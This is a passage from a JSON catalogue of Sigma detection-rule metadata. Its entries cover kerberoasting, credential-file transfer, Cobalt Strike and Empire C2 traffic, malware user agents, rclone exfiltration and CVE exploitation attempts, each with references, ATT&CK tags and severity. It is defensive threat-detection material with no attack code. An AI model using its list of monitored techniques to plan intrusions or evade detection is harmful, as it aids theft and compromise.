"refs": [ - "https://github.com/neo23x0/sigma/blob/373424f14574facf9e261d5c822345a282b91479/rules/windows/builtin/win_transferring_files_with_credential_data_via_network_shares.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" - ], - "creation_date": "2020/04/02", - "filename": "zeek_smb_converted_win_transferring_files_with_credential_data.yml", - "author": "@neu5ron, Teymur Kheirkhabarov, oscd.community", - "level": "medium", - "falsepositive": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", - "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", - "value": "Kerberos Network Traffic RC4 Ticket Encryption", - "meta": { - "refs": [ - "https://adsecurity.org/?p=3458", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2020/02/12", - "filename": "zeek_susp_kerberos_rc4.yml", - "author": "sigma", - "level": "medium", - "falsepositive": [ - "Normal enterprise SPN requests activity" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detect update check performed by Advanced IP Scanner and Advanced Port Scanner", - "uuid": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", - "value": "Advanced IP/Port Scanner Update Check", - "meta": { - "refs": [ - "https://www.advanced-ip-scanner.com/", - "https://www.advanced-port-scanner.com/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" - 
], - "tags": [ - "attack.discovery", - "attack.t1590" - ], - "creation_date": "2022/08/14", - "filename": "proxy_adv_ip_port_scanner_upd_check.yml", - "author": "Axel Olsson", - "level": "medium", - "falsepositive": [ - "Legitimate use by administrators" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent string of APT40 Dropbox tool", - "uuid": "5ba715b6-71b7-44fd-8245-f66893e81b3d", - "value": "APT40 Dropbox Tool User Agent", - "meta": { - "refs": [ - "Internal research from Florian Roth", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt40.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2019/11/12", - "filename": "proxy_apt40.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Old browsers" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group", - "uuid": "6c939dfa-c710-4e12-a4dd-47e1f10e68e1", - "value": "Domestic Kitten FurBall Malware Pattern", - "meta": { - "refs": [ - "https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_apt_domestic_kitten.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2021/02/08", - "filename": "proxy_apt_domestic_kitten.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Baby Shark C2 Framework communication patterns", - "uuid": "304810ed-8853-437f-9e36-c4975c3dfd7e", - "value": "BabyShark Agent Pattern", - "meta": { - "refs": [ - 
"https://nasbench.medium.com/understanding-detecting-c2-frameworks-babyshark-641be4595845", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_baby_shark.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2021/06/09", - "filename": "proxy_baby_shark.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects HTTP requests used by Chafer malware", - "uuid": "fb502828-2db0-438e-93e6-801c7548686d", - "value": "Chafer Malware URL Pattern", - "meta": { - "refs": [ - "https://securelist.com/chafer-used-remexi-malware/89538/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_chafer_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/01/31", - "filename": "proxy_chafer_malware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Malleable Amazon Profile", - "uuid": "953b895e-5cc9-454b-b183-7f3db555452e", - "value": "CobaltStrike Malleable Amazon Browsing Traffic Profile", - "meta": { - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile", - "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_cobalt_amazon.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - 
"logsource.product": "No established product" - } - }, - { - "description": "Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike", - "uuid": "41b42a36-f62c-4c34-bd40-8cb804a34ad8", - "value": "CobaltStrike Malformed UAs in Malleable Profiles", - "meta": { - "refs": [ - "https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_malformed_uas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2021/05/06", - "filename": "proxy_cobalt_malformed_uas.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Malleable (OCSP) Profile with Typo (OSCP) in URL", - "uuid": "37325383-740a-403d-b1a2-b2b4ab7992e7", - "value": "CobaltStrike Malleable (OCSP) Profile", - "meta": { - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_ocsp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_cobalt_ocsp.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Malleable OneDrive Profile", - "uuid": "c9b33401-cc6a-4cf6-83bb-57ddcb2407fc", - "value": "CobaltStrike Malleable OneDrive Browsing Traffic Profile", - "meta": { - "refs": [ - "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_onedrive.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_cobalt_onedrive.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects WebDav DownloadCradle", - "uuid": "e09aed7a-09e0-4c9a-90dd-f0d52507347e", - "value": "Windows WebDAV User Agent", - "meta": { - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_downloadcradle_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2018/04/06", - "filename": "proxy_downloadcradle_webdav.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents", - "Legitimate WebDAV administration" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects download of certain file types from hosts with dynamic DNS names (selected list)", - "uuid": "195c1119-ef07-4909-bb12-e66f5e07bf3c", - "value": "Download from Suspicious Dyndns Hosts", - "meta": { - "refs": [ - "https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_dyndns.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1105", - "attack.t1568" - ], - "creation_date": "2017/11/08", - "filename": "proxy_download_susp_dyndns.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Software downloads" - ], - 
"logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects download of certain file types from hosts in suspicious TLDs", - "uuid": "00d0b5ab-1f55-4120-8e83-487c0a7baf19", - "value": "Download from Suspicious TLD", - "meta": { - "refs": [ - "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", - "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", - "https://www.spamhaus.org/statistics/tlds/", - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" - ], - "creation_date": "2017/11/07", - "filename": "proxy_download_susp_tlds_blacklist.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "All kinds of software downloads" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects executable downloads from suspicious remote systems", - "uuid": "b5de2919-b74a-4805-91a7-5049accbaefe", - "value": "Download EXE from Suspicious TLD", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_whitelist.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566", - "attack.execution", - "attack.t1203", - "attack.t1204.002" - ], - "creation_date": "2017/03/13", - "filename": "proxy_download_susp_tlds_whitelist.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "All kind of software downloads" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects user agent and URI paths used by empire agents", - "uuid": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", - "value": "Empire UserAgent URI Combo", - "meta": { - "refs": [ - 
"https://github.com/BC-SECURITY/Empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empire_ua_uri_combos.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2020/07/13", - "filename": "proxy_empire_ua_uri_combos.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Valid requests with this exact user agent to server scripts of the defined names" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious empty user agent strings in proxy logs", - "uuid": "21e44d78-95e7-421b-a464-ffd8395659c4", - "value": "Empty User Agent", - "meta": { - "refs": [ - "https://twitter.com/Carlos_Perez/status/883455096645931008", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_empty_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_empty_ua.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects URL pattern used by iOS Implant", - "uuid": "e06ac91d-b9e6-443d-8e5b-af749e7aa6b6", - "value": "iOS Implant URL Pattern", - "meta": { - "refs": [ - "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", - "https://twitter.com/craiu/status/1167358457344925696", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.collection", - "attack.t1005", - "attack.t1119", - "attack.credential_access", - "attack.t1528", - "attack.t1552.001" - ], - "creation_date": "2019/08/30", - "filename": "proxy_ios_implant.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j.", - "uuid": "53c15703-b04c-42bb-9055-1937ddfb3392", - "value": "Java Class Proxy Download", - "meta": { - "refs": [ - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_java_class_download.yml" - ], - "tags": [ - "attack.initial_access" - ], - "creation_date": "2021/12/21", - "filename": "proxy_java_class_download.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Windows PowerShell Web Access", - "uuid": "c8557060-9221-4448-8794-96320e6f3e74", - "value": "Windows PowerShell User Agent", - "meta": { - "refs": [ - "https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_powershell_ua.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/03/13", - "filename": "proxy_powershell_ua.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Administrative scripts that download files from the Internet", - "Administrative scripts that retrieve certain website contents" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", - "uuid": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", - "value": "PwnDrp Access", - "meta": { - "refs": [ - "https://breakdev.org/pwndrop/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_pwndrop.yml" - 
], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003" - ], - "creation_date": "2020/04/15", - "filename": "proxy_pwndrop.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form", - "uuid": "5468045b-4fcc-4d1a-973c-c9c9578edacb", - "value": "Raw Paste Service Access", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/domain/paste.ee/relations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_raw_paste_service_access.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.001", - "attack.t1102.003", - "attack.defense_evasion" - ], - "creation_date": "2019/12/05", - "filename": "proxy_raw_paste_service_access.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "User activity (e.g. 
developer that shared and copied code snippets and used the raw link instead of just copy & paste)" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a flashplayer update from an unofficial location", - "uuid": "4922a5dd-6743-4fc2-8e81-144374280997", - "value": "Flash Player Update from Suspicious Location", - "meta": { - "refs": [ - "https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_susp_flash_download_loc.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1189", - "attack.execution", - "attack.t1204.002", - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2017/10/25", - "filename": "proxy_susp_flash_download_loc.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown flash download locations" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious requests to Telegram API without the usual Telegram User-Agent", - "uuid": "b494b165-6634-483d-8c47-2026a6c52372", - "value": "Telegram API Access", - "meta": { - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.t1102.002" - ], - "creation_date": "2018/06/05", - "filename": "proxy_telegram_api.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate use of Telegram bots in the 
company" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Turla ComRAT patterns", - "uuid": "7857f021-007f-4928-8b2c-7aedbe64bb82", - "value": "Turla ComRAT", - "meta": { - "refs": [ - "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_turla_comrat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1071.001", - "attack.g0010" - ], - "creation_date": "2020/05/26", - "filename": "proxy_turla_comrat.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used in APT malware in proxy logs", - "uuid": "6ec820f2-e963-4801-9127-d8b2dce4d31b", - "value": "APT User Agent", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_apt.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/11/12", - "filename": "proxy_ua_apt.yml", - "author": "Florian Roth, Markus Neis", - "level": "high", - "falsepositive": [ - "Old browsers" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", - "uuid": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", - "value": "Bitsadmin to Uncommon IP Server Address", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_ip.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190" - ], - "creation_date": "2022/06/10", - "filename": "proxy_ua_bitsadmin_susp_ip.yml", - "author": 
"Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Bitsadmin connections to domains with uncommon TLDs", - "uuid": "9eb68894-7476-4cd6-8752-23b51f5883a7", - "value": "Bitsadmin to Uncommon TLD", - "meta": { - "refs": [ - "https://twitter.com/jhencinski/status/1102695118455349248", - "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001", - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190" - ], - "creation_date": "2019/03/07", - "filename": "proxy_ua_bitsadmin_susp_tld.yml", - "author": "Florian Roth, Tim Shelton", - "level": "high", - "falsepositive": [ - "Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used by crypto miners in proxy logs", - "uuid": "fa935401-513b-467b-81f4-f9e77aa0dd78", - "value": "Crypto Miner User Agent", - "meta": { - "refs": [ - "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65", - "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/10/21", - "filename": "proxy_ua_cryptominer.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent 
strings used by exploit / pentest frameworks like Metasploit in proxy logs", - "uuid": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", - "value": "Exploit Framework User Agent", - "meta": { - "refs": [ - "https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_frameworks.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_frameworks.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings user by hack tools in proxy logs", - "uuid": "c42a3073-30fb-48ae-8c99-c23ada84b103", - "value": "Hack Tool User Agent", - "meta": { - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_hacktool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_hacktool.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious user agent strings used by malware in proxy logs", - "uuid": "5c84856b-55a5-45f1-826f-13f37250cf4e", - "value": "Malware User Agent", - "meta": { - "refs": [ - "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - 
"https://perishablepress.com/blacklist/ua-2013.txt", - "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_malware.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", - "uuid": "2c03648b-e081-41a5-b9fb-7d854a915091", - "value": "Rclone Activity via Proxy", - "meta": { - "refs": [ - "https://rclone.org/", - "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ], - "creation_date": "2022/10/18", - "filename": "proxy_ua_rclone.yml", - "author": "Janantha Marasinghe", - "level": "medium", - "falsepositive": [ - "Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious malformed user agent strings in proxy logs", - "uuid": "7195a772-4b3f-43a4-a210-6a003d65caa1", - "value": "Suspicious User Agent", - "meta": { - "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2017/07/08", - "filename": "proxy_ua_susp.yml", - "author": 
"Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious User Agent strings that end with an equal sign, which can be a sign of base64 encoded values used as User Agent string", - "uuid": "894a8613-cf12-48b3-8e57-9085f54aa0c3", - "value": "Suspicious Base64 User Agent", - "meta": { - "refs": [ - "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_susp_base64.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2022/07/08", - "filename": "proxy_ua_susp_base64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects Ursnif C2 traffic.", - "uuid": "932ac737-33ca-4afd-9869-0d48b391fcc9", - "value": "Ursnif Malware C2 URL Pattern", - "meta": { - "refs": [ - "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_c2_url.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1204.002", - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2019/12/19", - "filename": "proxy_ursnif_malware_c2_url.yml", - "author": "Thomas Patzke", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects download of Ursnif malware done by dropper documents.", - "uuid": "a36ce77e-30db-4ea0-8795-644d7af5dfb4", - "value": "Ursnif Malware Download URL Pattern", - "meta": { - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ursnif_malware_download_url.yml" - ], - "tags": "No established tags", - "creation_date": "2019/12/19", - "filename": "proxy_ursnif_malware_download_url.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "proxy", - "logsource.product": "No established product" - } - }, - { - "description": "Detects a segmentation fault error message caused by a creashing apache worker process", - "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", - "value": "Apache Segmentation Fault", - "meta": { - "refs": [ - "http://www.securityfocus.com/infocus/1633", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_segfault.yml" - ], - "tags": [ - "attack.impact", - "attack.t1499.004" - ], - "creation_date": "2017/02/28", - "filename": "web_apache_segfault.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "Detects an issue in apache logs that reports threading related errors", - "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", - "value": "Apache Threading Error", - "meta": { - "refs": [ - "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_apache_threading_error.yml" - ], - "tags": "No established tags", - "creation_date": "2019/01/22", - "filename": "web_apache_threading_error.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" - ], - "logsource.category": "No established category", - "logsource.product": "No established product" - } - }, - { - "description": "MODx manager - Local File Inclusion:Directory traversal vulnerability in 
manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier,\nwhen magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.\n", - "uuid": "a4a899e8-fd7a-49dd-b5a8-7044def72d61", - "value": "CVE-2010-5278 Exploitation Attempt", - "meta": { - "refs": [ - "https://github.com/projectdiscovery/nuclei-templates", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2010_5278_exploitation_attempt.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ], - "creation_date": "2021/08/25", - "filename": "web_cve_2010_5278_exploitation_attempt.yml", - "author": "Subhash Popuri (@pbssubhash)", - "level": "critical", - "falsepositive": [ - "Scanning from Nuclei", - "Unknown" - ], - "logsource.category": "webserver", - "logsource.product": "No established product" - } - }, - { - "description": "Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287", - "uuid": "a133193c-2daa-4a29-8022-018695fcf0ae", - "value": "Rejetto HTTP File Server RCE", - "meta": { - "refs": [ - "https://vk9-sec.com/hfs-code-execution-cve-2014-6287/", - "https://www.exploit-db.com/exploits/39161", - "https://github.com/Twigonometry/Cybersecurity-Notes/blob/c875b0f52df7d2c7a870e75e1f0c2679d417931d/Writeups/Hack%20the%20Box/Boxes/Optimum/10%20-%20Website.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2014_6287_hfs_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.t1505.003", - "cve.2014.6287" - ], - "creation_date": "2022/07/19", - "filename": "web_cve_2014_6287_hfs_rce.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - 